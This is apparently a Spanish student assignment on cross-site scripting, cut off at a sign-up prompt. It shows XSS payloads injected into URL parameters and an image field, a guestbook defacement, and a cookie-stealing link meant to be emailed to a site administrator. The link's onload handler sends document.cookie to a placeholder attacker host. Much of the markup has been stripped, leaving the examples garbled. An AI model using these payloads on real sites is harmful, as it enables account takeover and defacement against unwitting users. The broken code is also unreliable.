Tarea
Ejemplo 1
ejemplo1.php
Ejemplo 1 Elige tu sistema favorito Linux Windoz MacOs
ejemplo1-2.php
Ejemplo1 Elegiste:
En el ejemplo1.php se presenta una encuesta,luego de seleccionar alguna opción, los datos son enviados a la página “ejemplo1 2.php” , en donde se los imprime. Este simple ejemplo permite inyectar código XSS, debido a que la variable no estáfiltrada, un ejemplo de inyección podría ser:
http://victima.com/ejemplo1.2.php?os=alert('CheByte')
Ejemplo 2
ejemplo2.php
Ejemplo 2 URL de la imagen:
Este ejemplo permite ingresaruna imagen, donde luego se la mostrará. Como en este ejemplo tampoco se hace un filtro de lo que se ingresa podríamos hacer las siguientes inyecciones.
En el campo de url se podría inyectar:http://victima.com/hola.jpg>"alert('CheByte')
Otra tipo de inyeción que podriamos ingresar en el box de url
http://viticma.com/hola.jpg>"document.cookie
Unas de las webapps mas vulnerables a estetipo de ataques son los guestbook, la cual la mayoría no realiza controles de datos, permitiendo hacer un simple deface ingresando código html, ya que los datos son almacenados en una base de datos.Este deface se lo podría realizar inyectando en la firma dentro del guestbook
el código de hack.php podría tener la forma
BY CHEBYTE
Esto ocasionaría que cada ves que se ingrese alguestbook, se abra la página hack.php como frame superior con el texto “BY CHEBYTE”.
Con esta técnica también se puede obtener datos del usuario como ser las cookies. A continuación vamos a ver un ejemplode como obtenerlas.
Supongamos que encontramos una falla de XSS en el sitio xxxx.com. Conseguimos el email del administrador o de algun user y le podríamos enviar el siguiente link.http://xxxx.com/gnusoft/images/Windows.gif name="hia" onload="hia.src='http://TU_URL/hack.php?cookie='% 20+document.cookie;">
Donde el código de hack.php seria:
El usuario al entrar a ese link, envía...
Regístrate para leer el documento completo.